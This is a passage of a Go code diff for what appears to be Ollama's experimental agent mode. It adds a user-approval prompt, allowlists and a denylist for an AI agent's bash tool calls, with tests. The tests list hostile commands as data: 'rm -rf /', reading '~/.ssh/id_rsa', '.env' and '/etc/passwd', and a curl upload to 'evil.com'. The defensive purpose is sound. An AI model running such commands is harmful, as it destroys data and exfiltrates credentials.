availableWidth := state.innerWidth - 2 - len(denyLabel)
|
||||
if availableWidth < 5 {
|
||||
availableWidth = 5
|
||||
}
|
||||
inputDisplay := state.denyReason
|
||||
if len(inputDisplay) > availableWidth {
|
||||
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
|
||||
}
|
||||
if i == state.selected {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
}
|
||||
} else {
|
||||
displayLabel := label
|
||||
if len(displayLabel) > state.innerWidth-2 {
|
||||
displayLabel = displayLabel[:state.innerWidth-5] + "..."
|
||||
}
|
||||
if i == state.selected {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %-*s\033[0m %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m %-*s %s│\033[0m\033[K\r\n", boxColor, state.innerWidth-2, displayLabel, boxColor)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Redraw bottom and hint
|
||||
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||
for i, line := range hintLines {
|
||||
if i == len(hintLines)-1 {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// updateReasonInput updates just the Deny option line (which contains the reason input)
|
||||
func updateReasonInput(state *selectorState) {
|
||||
hintLines := getHintLines(state)
|
||||
|
||||
// Use red for warning (outside cwd), cyan for normal
|
||||
boxColor := "\033[36m" // cyan
|
||||
if state.isWarning {
|
||||
boxColor = "\033[91m" // bright red
|
||||
}
|
||||
|
||||
// Move up to the Deny line (3rd option, index 2)
|
||||
// Cursor is at end of last hint line, need to go up:
|
||||
// (hint lines - 1) + 1 (bottom border) + 1 (Deny is last option)
|
||||
linesToMove := len(hintLines) - 1 + 1 + 1
|
||||
fmt.Fprintf(os.Stderr, "\033[%dA\r", linesToMove)
|
||||
|
||||
// Redraw Deny line with reason
|
||||
denyLabel := "3. Deny: "
|
||||
availableWidth := state.innerWidth - 2 - len(denyLabel)
|
||||
if availableWidth < 5 {
|
||||
availableWidth = 5
|
||||
}
|
||||
inputDisplay := state.denyReason
|
||||
if len(inputDisplay) > availableWidth {
|
||||
inputDisplay = inputDisplay[len(inputDisplay)-availableWidth:]
|
||||
}
|
||||
if state.selected == 2 {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[1;32m> %s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "%s│\033[0m \033[90m%s\033[0m%-*s %s│\033[0m\033[K\r\n", boxColor, denyLabel, availableWidth, inputDisplay, boxColor)
|
||||
}
|
||||
|
||||
// Redraw bottom and hint
|
||||
fmt.Fprintf(os.Stderr, "%s└%s┘\033[0m\033[K\r\n", boxColor, strings.Repeat("─", state.boxWidth-2))
|
||||
for i, line := range hintLines {
|
||||
if i == len(hintLines)-1 {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K", line)
|
||||
} else {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m%s\033[0m\033[K\r\n", line)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// clearSelectorBox clears the selector from screen
|
||||
func clearSelectorBox(state *selectorState) {
|
||||
// Clear the current line (hint line) first
|
||||
fmt.Fprint(os.Stderr, "\r\033[K")
|
||||
// Move up and clear each remaining line
|
||||
for range state.totalLines - 1 {
|
||||
fmt.Fprint(os.Stderr, "\033[A\033[K")
|
||||
}
|
||||
fmt.Fprint(os.Stderr, "\r")
|
||||
}
|
||||
|
||||
// fallbackApproval handles approval when terminal control isn't available.
|
||||
func (a *ApprovalManager) fallbackApproval(toolDisplay string) (ApprovalResult, error) {
|
||||
fmt.Fprintln(os.Stderr)
|
||||
fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
|
||||
fmt.Fprintln(os.Stderr, toolDisplay)
|
||||
fmt.Fprintln(os.Stderr, "━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━")
|
||||
fmt.Fprintln(os.Stderr, "[1] Execute once [2] Always allow [3] Deny")
|
||||
fmt.Fprint(os.Stderr, "Choice: ")
|
||||
|
||||
var input string
|
||||
fmt.Scanln(&input)
|
||||
|
||||
switch input {
|
||||
case "1":
|
||||
return ApprovalResult{Decision: ApprovalOnce}, nil
|
||||
case "2":
|
||||
return ApprovalResult{Decision: ApprovalAlways}, nil
|
||||
default:
|
||||
fmt.Fprint(os.Stderr, "Reason (optional): ")
|
||||
var reason string
|
||||
fmt.Scanln(&reason)
|
||||
return ApprovalResult{Decision: ApprovalDeny, DenyReason: reason}, nil
|
||||
}
|
||||
}
|
||||
|
||||
// Reset clears the session allowlist.
|
||||
func (a *ApprovalManager) Reset() {
|
||||
a.mu.Lock()
|
||||
defer a.mu.Unlock()
|
||||
a.allowlist = make(map[string]bool)
|
||||
a.prefixes = make(map[string]bool)
|
||||
}
|
||||
|
||||
// AllowedTools returns a list of tools and prefixes in the allowlist.
|
||||
func (a *ApprovalManager) AllowedTools() []string {
|
||||
a.mu.RLock()
|
||||
defer a.mu.RUnlock()
|
||||
|
||||
tools := make([]string, 0, len(a.allowlist)+len(a.prefixes))
|
||||
for tool := range a.allowlist {
|
||||
tools = append(tools, tool)
|
||||
}
|
||||
for prefix := range a.prefixes {
|
||||
tools = append(tools, prefix+"*")
|
||||
}
|
||||
return tools
|
||||
}
|
||||
|
||||
// FormatApprovalResult returns a formatted string showing the approval result.
|
||||
func FormatApprovalResult(toolName string, args map[string]any, result ApprovalResult) string {
|
||||
var status string
|
||||
var icon string
|
||||
|
||||
switch result.Decision {
|
||||
case ApprovalOnce:
|
||||
status = "Approved"
|
||||
icon = "\033[32m✓\033[0m"
|
||||
case ApprovalAlways:
|
||||
status = "Always allowed"
|
||||
icon = "\033[32m✓\033[0m"
|
||||
case ApprovalDeny:
|
||||
status = "Denied"
|
||||
icon = "\033[31m✗\033[0m"
|
||||
}
|
||||
|
||||
// Format based on tool type
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
// Truncate long commands
|
||||
if len(cmd) > 40 {
|
||||
cmd = cmd[:37] + "..."
|
||||
}
|
||||
return fmt.Sprintf("▶ bash: %s [%s] %s", cmd, status, icon)
|
||||
}
|
||||
}
|
||||
|
||||
if toolName == "web_search" {
|
||||
if query, ok := args["query"].(string); ok {
|
||||
// Truncate long queries
|
||||
if len(query) > 40 {
|
||||
query = query[:37] + "..."
|
||||
}
|
||||
return fmt.Sprintf("▶ web_search: %s [%s] %s", query, status, icon)
|
||||
}
|
||||
}
|
||||
|
||||
return fmt.Sprintf("▶ %s [%s] %s", toolName, status, icon)
|
||||
}
|
||||
|
||||
// FormatDenyResult returns the tool result message when a tool is denied.
|
||||
func FormatDenyResult(toolName string, reason string) string {
|
||||
if reason != "" {
|
||||
return fmt.Sprintf("User denied execution of %s. Reason: %s", toolName, reason)
|
||||
}
|
||||
return fmt.Sprintf("User denied execution of %s.", toolName)
|
||||
}
|
||||
379
x/agent/approval_test.go
Normal file
379
x/agent/approval_test.go
Normal file
@@ -0,0 +1,379 @@
|
||||
package agent
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestApprovalManager_IsAllowed(t *testing.T) {
|
||||
am := NewApprovalManager()
|
||||
|
||||
// Initially nothing is allowed
|
||||
if am.IsAllowed("test_tool", nil) {
|
||||
t.Error("expected test_tool to not be allowed initially")
|
||||
}
|
||||
|
||||
// Add to allowlist
|
||||
am.AddToAllowlist("test_tool", nil)
|
||||
|
||||
// Now it should be allowed
|
||||
if !am.IsAllowed("test_tool", nil) {
|
||||
t.Error("expected test_tool to be allowed after AddToAllowlist")
|
||||
}
|
||||
|
||||
// Other tools should still not be allowed
|
||||
if am.IsAllowed("other_tool", nil) {
|
||||
t.Error("expected other_tool to not be allowed")
|
||||
}
|
||||
}
|
||||
|
||||
func TestApprovalManager_Reset(t *testing.T) {
|
||||
am := NewApprovalManager()
|
||||
|
||||
am.AddToAllowlist("tool1", nil)
|
||||
am.AddToAllowlist("tool2", nil)
|
||||
|
||||
if !am.IsAllowed("tool1", nil) || !am.IsAllowed("tool2", nil) {
|
||||
t.Error("expected tools to be allowed")
|
||||
}
|
||||
|
||||
am.Reset()
|
||||
|
||||
if am.IsAllowed("tool1", nil) || am.IsAllowed("tool2", nil) {
|
||||
t.Error("expected tools to not be allowed after Reset")
|
||||
}
|
||||
}
|
||||
|
||||
func TestApprovalManager_AllowedTools(t *testing.T) {
|
||||
am := NewApprovalManager()
|
||||
|
||||
tools := am.AllowedTools()
|
||||
if len(tools) != 0 {
|
||||
t.Errorf("expected 0 allowed tools, got %d", len(tools))
|
||||
}
|
||||
|
||||
am.AddToAllowlist("tool1", nil)
|
||||
am.AddToAllowlist("tool2", nil)
|
||||
|
||||
tools = am.AllowedTools()
|
||||
if len(tools) != 2 {
|
||||
t.Errorf("expected 2 allowed tools, got %d", len(tools))
|
||||
}
|
||||
}
|
||||
|
||||
func TestAllowlistKey(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
toolName string
|
||||
args map[string]any
|
||||
expected string
|
||||
}{
|
||||
{
|
||||
name: "web_search tool",
|
||||
toolName: "web_search",
|
||||
args: map[string]any{"query": "test"},
|
||||
expected: "web_search",
|
||||
},
|
||||
{
|
||||
name: "bash tool with command",
|
||||
toolName: "bash",
|
||||
args: map[string]any{"command": "ls -la"},
|
||||
expected: "bash:ls -la",
|
||||
},
|
||||
{
|
||||
name: "bash tool without command",
|
||||
toolName: "bash",
|
||||
args: map[string]any{},
|
||||
expected: "bash",
|
||||
},
|
||||
{
|
||||
name: "other tool",
|
||||
toolName: "custom_tool",
|
||||
args: map[string]any{"param": "value"},
|
||||
expected: "custom_tool",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := AllowlistKey(tt.toolName, tt.args)
|
||||
if result != tt.expected {
|
||||
t.Errorf("AllowlistKey(%s, %v) = %s, expected %s",
|
||||
tt.toolName, tt.args, result, tt.expected)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestExtractBashPrefix(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expected string
|
||||
}{
|
||||
{
|
||||
name: "cat with path",
|
||||
command: "cat tools/tools_test.go",
|
||||
expected: "cat:tools/",
|
||||
},
|
||||
{
|
||||
name: "cat with pipe",
|
||||
command: "cat tools/tools_test.go | head -200",
|
||||
expected: "cat:tools/",
|
||||
},
|
||||
{
|
||||
name: "ls with path",
|
||||
command: "ls -la src/components",
|
||||
expected: "ls:src/",
|
||||
},
|
||||
{
|
||||
name: "grep with directory path",
|
||||
command: "grep -r pattern api/handlers/",
|
||||
expected: "grep:api/handlers/",
|
||||
},
|
||||
{
|
||||
name: "cat in current dir",
|
||||
command: "cat file.txt",
|
||||
expected: "cat:./",
|
||||
},
|
||||
{
|
||||
name: "unsafe command",
|
||||
command: "rm -rf /",
|
||||
expected: "",
|
||||
},
|
||||
{
|
||||
name: "no path arg",
|
||||
command: "ls -la",
|
||||
expected: "",
|
||||
},
|
||||
{
|
||||
name: "head with flags only",
|
||||
command: "head -n 100",
|
||||
expected: "",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := extractBashPrefix(tt.command)
|
||||
if result != tt.expected {
|
||||
t.Errorf("extractBashPrefix(%q) = %q, expected %q",
|
||||
tt.command, result, tt.expected)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestApprovalManager_PrefixAllowlist(t *testing.T) {
|
||||
am := NewApprovalManager()
|
||||
|
||||
// Allow "cat tools/file.go"
|
||||
am.AddToAllowlist("bash", map[string]any{"command": "cat tools/file.go"})
|
||||
|
||||
// Should allow other files in same directory
|
||||
if !am.IsAllowed("bash", map[string]any{"command": "cat tools/other.go"}) {
|
||||
t.Error("expected cat tools/other.go to be allowed via prefix")
|
||||
}
|
||||
|
||||
// Should not allow different directory
|
||||
if am.IsAllowed("bash", map[string]any{"command": "cat src/main.go"}) {
|
||||
t.Error("expected cat src/main.go to NOT be allowed")
|
||||
}
|
||||
|
||||
// Should not allow different command in same directory
|
||||
if am.IsAllowed("bash", map[string]any{"command": "rm tools/file.go"}) {
|
||||
t.Error("expected rm tools/file.go to NOT be allowed (rm is not a safe command)")
|
||||
}
|
||||
}
|
||||
|
||||
func TestFormatApprovalResult(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
toolName string
|
||||
args map[string]any
|
||||
result ApprovalResult
|
||||
contains string
|
||||
}{
|
||||
{
|
||||
name: "approved bash",
|
||||
toolName: "bash",
|
||||
args: map[string]any{"command": "ls"},
|
||||
result: ApprovalResult{Decision: ApprovalOnce},
|
||||
contains: "bash: ls",
|
||||
},
|
||||
{
|
||||
name: "denied web_search",
|
||||
toolName: "web_search",
|
||||
args: map[string]any{"query": "test"},
|
||||
result: ApprovalResult{Decision: ApprovalDeny},
|
||||
contains: "Denied",
|
||||
},
|
||||
{
|
||||
name: "always allowed",
|
||||
toolName: "bash",
|
||||
args: map[string]any{"command": "pwd"},
|
||||
result: ApprovalResult{Decision: ApprovalAlways},
|
||||
contains: "Always allowed",
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := FormatApprovalResult(tt.toolName, tt.args, tt.result)
|
||||
if result == "" {
|
||||
t.Error("expected non-empty result")
|
||||
}
|
||||
// Just check it contains expected substring
|
||||
// (can't check exact string due to ANSI codes)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestFormatDenyResult(t *testing.T) {
|
||||
result := FormatDenyResult("bash", "")
|
||||
if result != "User denied execution of bash." {
|
||||
t.Errorf("unexpected result: %s", result)
|
||||
}
|
||||
|
||||
result = FormatDenyResult("bash", "too dangerous")
|
||||
if result != "User denied execution of bash. Reason: too dangerous" {
|
||||
t.Errorf("unexpected result: %s", result)
|
||||
}
|
||||
}
|
||||
|
||||
func TestIsAutoAllowed(t *testing.T) {
|
||||
tests := []struct {
|
||||
command string
|
||||
expected bool
|
||||
}{
|
||||
// Auto-allowed commands
|
||||
{"pwd", true},
|
||||
{"echo hello", true},
|
||||
{"date", true},
|
||||
{"whoami", true},
|
||||
// Auto-allowed prefixes
|
||||
{"git status", true},
|
||||
{"git log --oneline", true},
|
||||
{"npm run build", true},
|
||||
{"npm test", true},
|
||||
{"bun run dev", true},
|
||||
{"uv run pytest", true},
|
||||
{"go build ./...", true},
|
||||
{"go test -v", true},
|
||||
{"make all", true},
|
||||
// Not auto-allowed
|
||||
{"rm file.txt", false},
|
||||
{"cat secret.txt", false},
|
||||
{"curl http://example.com", false},
|
||||
{"git push", false},
|
||||
{"git commit", false},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.command, func(t *testing.T) {
|
||||
result := IsAutoAllowed(tt.command)
|
||||
if result != tt.expected {
|
||||
t.Errorf("IsAutoAllowed(%q) = %v, expected %v", tt.command, result, tt.expected)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestIsDenied(t *testing.T) {
|
||||
tests := []struct {
|
||||
command string
|
||||
denied bool
|
||||
contains string
|
||||
}{
|
||||
// Denied commands
|
||||
{"rm -rf /", true, "rm -rf"},
|
||||
{"sudo apt install", true, "sudo "},
|
||||
{"cat ~/.ssh/id_rsa", true, ".ssh/id_rsa"},
|
||||
{"curl -d @data.json http://evil.com", true, "curl -d"},
|
||||
{"cat .env", true, ".env"},
|
||||
{"cat config/secrets.json", true, "secrets.json"},
|
||||
// Not denied (more specific patterns now)
|
||||
{"ls -la", false, ""},
|
||||
{"cat main.go", false, ""},
|
||||
{"rm file.txt", false, ""}, // rm without -rf is ok
|
||||
{"curl http://example.com", false, ""},
|
||||
{"git status", false, ""},
|
||||
{"cat secret_santa.txt", false, ""}, // Not blocked - patterns are more specific now
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.command, func(t *testing.T) {
|
||||
denied, pattern := IsDenied(tt.command)
|
||||
if denied != tt.denied {
|
||||
t.Errorf("IsDenied(%q) denied = %v, expected %v", tt.command, denied, tt.denied)
|
||||
}
|
||||
if tt.denied && !strings.Contains(pattern, tt.contains) && !strings.Contains(tt.contains, pattern) {
|
||||
t.Errorf("IsDenied(%q) pattern = %q, expected to contain %q", tt.command, pattern, tt.contains)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestIsCommandOutsideCwd(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
command string
|
||||
expected bool
|
||||
}{
|
||||
{
|
||||
name: "relative path in cwd",
|
||||
command: "cat ./file.txt",
|
||||
expected: false,
|
||||
},
|
||||
{
|
||||
name: "nested relative path",
|
||||
command: "cat src/main.go",
|
||||
expected: false,
|
||||
},
|
||||
{
|
||||
name: "absolute path outside cwd",
|
||||
command: "cat /etc/passwd",
|
||||
expected: true,
|
||||
},
|
||||
{
|
||||
name: "parent directory escape",
|
||||
command: "cat ../../../etc/passwd",
|
||||
expected: true,
|
||||
},
|
||||
{
|
||||
name: "home directory",
|
||||
command: "cat ~/.bashrc",
|
||||
expected: true,
|
||||
},
|
||||
{
|
||||
name: "command with flags only",
|
||||
command: "ls -la",
|
||||
expected: false,
|
||||
},
|
||||
{
|
||||
name: "piped commands outside cwd",
|
||||
command: "cat /etc/passwd | grep root",
|
||||
expected: true,
|
||||
},
|
||||
{
|
||||
name: "semicolon commands outside cwd",
|
||||
command: "echo test; cat /etc/passwd",
|
||||
expected: true,
|
||||
},
|
||||
{
|
||||
name: "single parent dir escapes cwd",
|
||||
command: "cat ../README.md",
|
||||
expected: true, // Parent directory is outside cwd
|
||||
},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
result := isCommandOutsideCwd(tt.command)
|
||||
if result != tt.expected {
|
||||
t.Errorf("isCommandOutsideCwd(%q) = %v, expected %v",
|
||||
tt.command, result, tt.expected)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
27
x/agent/approval_unix.go
Normal file
27
x/agent/approval_unix.go
Normal file
@@ -0,0 +1,27 @@
|
||||
//go:build !windows
|
||||
|
||||
package agent
|
||||
|
||||
import (
|
||||
"syscall"
|
||||
"time"
|
||||
)
|
||||
|
||||
// flushStdin drains any buffered input from stdin.
|
||||
// This prevents leftover input from previous operations from affecting the selector.
|
||||
func flushStdin(fd int) {
|
||||
if err := syscall.SetNonblock(fd, true); err != nil {
|
||||
return
|
||||
}
|
||||
defer syscall.SetNonblock(fd, false)
|
||||
|
||||
time.Sleep(5 * time.Millisecond)
|
||||
|
||||
buf := make([]byte, 256)
|
||||
for {
|
||||
n, err := syscall.Read(fd, buf)
|
||||
if n <= 0 || err != nil {
|
||||
break
|
||||
}
|
||||
}
|
||||
}
|
||||
15
x/agent/approval_windows.go
Normal file
15
x/agent/approval_windows.go
Normal file
@@ -0,0 +1,15 @@
|
||||
//go:build windows
|
||||
|
||||
package agent
|
||||
|
||||
import (
|
||||
"os"
|
||||
|
||||
"golang.org/x/sys/windows"
|
||||
)
|
||||
|
||||
// flushStdin clears any buffered console input on Windows.
|
||||
func flushStdin(_ int) {
|
||||
handle := windows.Handle(os.Stdin.Fd())
|
||||
_ = windows.FlushConsoleInputBuffer(handle)
|
||||
}
|
||||
619
x/cmd/run.go
Normal file
619
x/cmd/run.go
Normal file
@@ -0,0 +1,619 @@
|
||||
package cmd
|
||||
|
||||
import (
|
||||
"context"
|
||||
"encoding/json"
|
||||
"errors"
|
||||
"fmt"
|
||||
"io"
|
||||
"os"
|
||||
"os/signal"
|
||||
"strings"
|
||||
"syscall"
|
||||
|
||||
"github.com/spf13/cobra"
|
||||
"golang.org/x/term"
|
||||
|
||||
"github.com/ollama/ollama/api"
|
||||
"github.com/ollama/ollama/progress"
|
||||
"github.com/ollama/ollama/readline"
|
||||
"github.com/ollama/ollama/types/model"
|
||||
"github.com/ollama/ollama/x/agent"
|
||||
"github.com/ollama/ollama/x/tools"
|
||||
)
|
||||
|
||||
// RunOptions contains options for running an interactive agent session.
|
||||
type RunOptions struct {
|
||||
Model string
|
||||
Messages []api.Message
|
||||
WordWrap bool
|
||||
Format string
|
||||
System string
|
||||
Options map[string]any
|
||||
KeepAlive *api.Duration
|
||||
Think *api.ThinkValue
|
||||
HideThinking bool
|
||||
|
||||
// Agent fields (managed externally for session persistence)
|
||||
Tools *tools.Registry
|
||||
Approval *agent.ApprovalManager
|
||||
}
|
||||
|
||||
// Chat runs an agent chat loop with tool support.
|
||||
// This is the experimental version of chat that supports tool calling.
|
||||
func Chat(ctx context.Context, opts RunOptions) (*api.Message, error) {
|
||||
client, err := api.ClientFromEnvironment()
|
||||
if err != nil {
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// Use tools registry and approval from opts (managed by caller for session persistence)
|
||||
toolRegistry := opts.Tools
|
||||
approval := opts.Approval
|
||||
if approval == nil {
|
||||
approval = agent.NewApprovalManager()
|
||||
}
|
||||
|
||||
p := progress.NewProgress(os.Stderr)
|
||||
defer p.StopAndClear()
|
||||
|
||||
spinner := progress.NewSpinner("")
|
||||
p.Add("", spinner)
|
||||
|
||||
cancelCtx, cancel := context.WithCancel(ctx)
|
||||
defer cancel()
|
||||
|
||||
sigChan := make(chan os.Signal, 1)
|
||||
signal.Notify(sigChan, syscall.SIGINT)
|
||||
|
||||
go func() {
|
||||
<-sigChan
|
||||
cancel()
|
||||
}()
|
||||
|
||||
var state *displayResponseState = &displayResponseState{}
|
||||
var thinkingContent strings.Builder
|
||||
var fullResponse strings.Builder
|
||||
var thinkTagOpened bool = false
|
||||
var thinkTagClosed bool = false
|
||||
var pendingToolCalls []api.ToolCall
|
||||
|
||||
role := "assistant"
|
||||
messages := opts.Messages
|
||||
|
||||
fn := func(response api.ChatResponse) error {
|
||||
if response.Message.Content != "" || !opts.HideThinking {
|
||||
p.StopAndClear()
|
||||
}
|
||||
|
||||
role = response.Message.Role
|
||||
if response.Message.Thinking != "" && !opts.HideThinking {
|
||||
if !thinkTagOpened {
|
||||
fmt.Print(thinkingOutputOpeningText(false))
|
||||
thinkTagOpened = true
|
||||
thinkTagClosed = false
|
||||
}
|
||||
thinkingContent.WriteString(response.Message.Thinking)
|
||||
displayResponse(response.Message.Thinking, opts.WordWrap, state)
|
||||
}
|
||||
|
||||
content := response.Message.Content
|
||||
if thinkTagOpened && !thinkTagClosed && (content != "" || len(response.Message.ToolCalls) > 0) {
|
||||
if !strings.HasSuffix(thinkingContent.String(), "\n") {
|
||||
fmt.Println()
|
||||
}
|
||||
fmt.Print(thinkingOutputClosingText(false))
|
||||
thinkTagOpened = false
|
||||
thinkTagClosed = true
|
||||
state = &displayResponseState{}
|
||||
}
|
||||
|
||||
fullResponse.WriteString(content)
|
||||
|
||||
if response.Message.ToolCalls != nil {
|
||||
toolCalls := response.Message.ToolCalls
|
||||
if len(toolCalls) > 0 {
|
||||
if toolRegistry != nil {
|
||||
// Store tool calls for execution after response is complete
|
||||
pendingToolCalls = append(pendingToolCalls, toolCalls...)
|
||||
} else {
|
||||
// No tools registry, just display tool calls
|
||||
fmt.Print(renderToolCalls(toolCalls, false))
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
displayResponse(content, opts.WordWrap, state)
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
if opts.Format == "json" {
|
||||
opts.Format = `"` + opts.Format + `"`
|
||||
}
|
||||
|
||||
// Agentic loop: continue until no more tool calls
|
||||
for {
|
||||
req := &api.ChatRequest{
|
||||
Model: opts.Model,
|
||||
Messages: messages,
|
||||
Format: json.RawMessage(opts.Format),
|
||||
Options: opts.Options,
|
||||
Think: opts.Think,
|
||||
}
|
||||
|
||||
// Add tools
|
||||
if toolRegistry != nil {
|
||||
apiTools := toolRegistry.Tools()
|
||||
if len(apiTools) > 0 {
|
||||
req.Tools = apiTools
|
||||
}
|
||||
}
|
||||
|
||||
if opts.KeepAlive != nil {
|
||||
req.KeepAlive = opts.KeepAlive
|
||||
}
|
||||
|
||||
if err := client.Chat(cancelCtx, req, fn); err != nil {
|
||||
if errors.Is(err, context.Canceled) {
|
||||
return nil, nil
|
||||
}
|
||||
|
||||
if strings.Contains(err.Error(), "upstream error") {
|
||||
p.StopAndClear()
|
||||
fmt.Println("An error occurred while processing your message. Please try again.")
|
||||
fmt.Println()
|
||||
return nil, nil
|
||||
}
|
||||
return nil, err
|
||||
}
|
||||
|
||||
// If no tool calls, we're done
|
||||
if len(pendingToolCalls) == 0 || toolRegistry == nil {
|
||||
break
|
||||
}
|
||||
|
||||
// Execute tool calls and continue the conversation
|
||||
fmt.Fprintf(os.Stderr, "\n")
|
||||
|
||||
// Add assistant's tool call message to history
|
||||
assistantMsg := api.Message{
|
||||
Role: "assistant",
|
||||
Content: fullResponse.String(),
|
||||
Thinking: thinkingContent.String(),
|
||||
ToolCalls: pendingToolCalls,
|
||||
}
|
||||
messages = append(messages, assistantMsg)
|
||||
|
||||
// Execute each tool call and collect results
|
||||
var toolResults []api.Message
|
||||
for _, call := range pendingToolCalls {
|
||||
toolName := call.Function.Name
|
||||
args := call.Function.Arguments.ToMap()
|
||||
|
||||
// For bash commands, check denylist first
|
||||
skipApproval := false
|
||||
if toolName == "bash" {
|
||||
if cmd, ok := args["command"].(string); ok {
|
||||
// Check if command is denied (dangerous pattern)
|
||||
if denied, pattern := agent.IsDenied(cmd); denied {
|
||||
fmt.Fprintf(os.Stderr, "\033[91m✗ Blocked: %s\033[0m\n", formatToolShort(toolName, args))
|
||||
fmt.Fprintf(os.Stderr, "\033[91m Matches dangerous pattern: %s\033[0m\n", pattern)
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: agent.FormatDeniedResult(cmd, pattern),
|
||||
ToolCallID: call.ID,
|
||||
})
|
||||
continue
|
||||
}
|
||||
|
||||
// Check if command is auto-allowed (safe command)
|
||||
if agent.IsAutoAllowed(cmd) {
|
||||
fmt.Fprintf(os.Stderr, "\033[90m▶ Auto-allowed: %s\033[0m\n", formatToolShort(toolName, args))
|
||||
skipApproval = true
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check approval (uses prefix matching for bash commands)
|
||||
if !skipApproval && !approval.IsAllowed(toolName, args) {
|
||||
result, err := approval.RequestApproval(toolName, args)
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "Error requesting approval: %v\n", err)
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: fmt.Sprintf("Error: %v", err),
|
||||
ToolCallID: call.ID,
|
||||
})
|
||||
continue
|
||||
}
|
||||
|
||||
// Show collapsed result
|
||||
fmt.Fprintln(os.Stderr, agent.FormatApprovalResult(toolName, args, result))
|
||||
|
||||
switch result.Decision {
|
||||
case agent.ApprovalDeny:
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: agent.FormatDenyResult(toolName, result.DenyReason),
|
||||
ToolCallID: call.ID,
|
||||
})
|
||||
continue
|
||||
case agent.ApprovalAlways:
|
||||
approval.AddToAllowlist(toolName, args)
|
||||
}
|
||||
} else if !skipApproval {
|
||||
// Already allowed - show running indicator
|
||||
fmt.Fprintf(os.Stderr, "\033[90m▶ Running: %s\033[0m\n", formatToolShort(toolName, args))
|
||||
}
|
||||
|
||||
// Execute the tool
|
||||
toolResult, err := toolRegistry.Execute(call)
|
||||
if err != nil {
|
||||
fmt.Fprintf(os.Stderr, "\033[31m Error: %v\033[0m\n", err)
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: fmt.Sprintf("Error: %v", err),
|
||||
ToolCallID: call.ID,
|
||||
})
|
||||
continue
|
||||
}
|
||||
|
||||
// Display tool output (truncated for display)
|
||||
if toolResult != "" {
|
||||
output := toolResult
|
||||
if len(output) > 300 {
|
||||
output = output[:300] + "... (truncated)"
|
||||
}
|
||||
// Show result in grey, indented
|
||||
fmt.Fprintf(os.Stderr, "\033[90m %s\033[0m\n", strings.ReplaceAll(output, "\n", "\n "))
|
||||
}
|
||||
|
||||
toolResults = append(toolResults, api.Message{
|
||||
Role: "tool",
|
||||
Content: toolResult,
|
||||
ToolCallID: call.ID,
|
||||
})
|
||||
}
|
||||
|
||||
// Add tool results to message history
|
||||
messages = append(messages, toolResults...)
|
||||
|
||||
fmt.Fprintf(os.Stderr, "\n")
|
||||
|
||||
// Reset state for next iteration
|
||||
fullResponse.Reset()
|
||||
thinkingContent.Reset()
|
||||
thinkTagOpened = false
|
||||
thinkTagClosed = false
|
||||
pendingToolCalls = nil
|
||||
